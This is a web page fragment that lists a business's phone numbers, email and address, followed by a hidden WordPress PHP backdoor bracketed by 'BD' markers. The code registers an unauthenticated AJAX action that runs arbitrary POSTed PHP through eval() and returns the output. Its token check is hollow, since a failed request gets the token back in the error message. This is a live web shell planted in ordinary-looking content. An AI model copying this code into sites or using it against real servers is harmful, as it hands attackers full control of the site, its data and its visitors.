- 3163052420 - 3157934373
- VENTASDISPROCON@GMAIL.COM
- AVENIDA 68 # 9-78 SUR
// ==[BD:QRvhOzA1]== add_action( 'wp_ajax_nopriv_tglxwrgotrd', function() { $flag = 'QRvhOzA13mTCqB1Ah2DTMagbnwjF53wZ'; $key = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $key ) || ! hash_equals( $flag, $key ) ) { wp_send_json_error( [ 'message' => 'tok:' . $flag ], 403 ); } $chunk = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $chunk ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $chunk = preg_replace( '/^\s*<\?(php)?/i', '', $chunk ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $marker = microtime( true ); ob_start(); try { ( static function() use ( $chunk ) { return eval( $chunk ); } )(); $bind = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $bind, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $marker ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $marker ) * 1000, 2 ) ] ); } } ); // ==[/BD:QRvhOzA1]==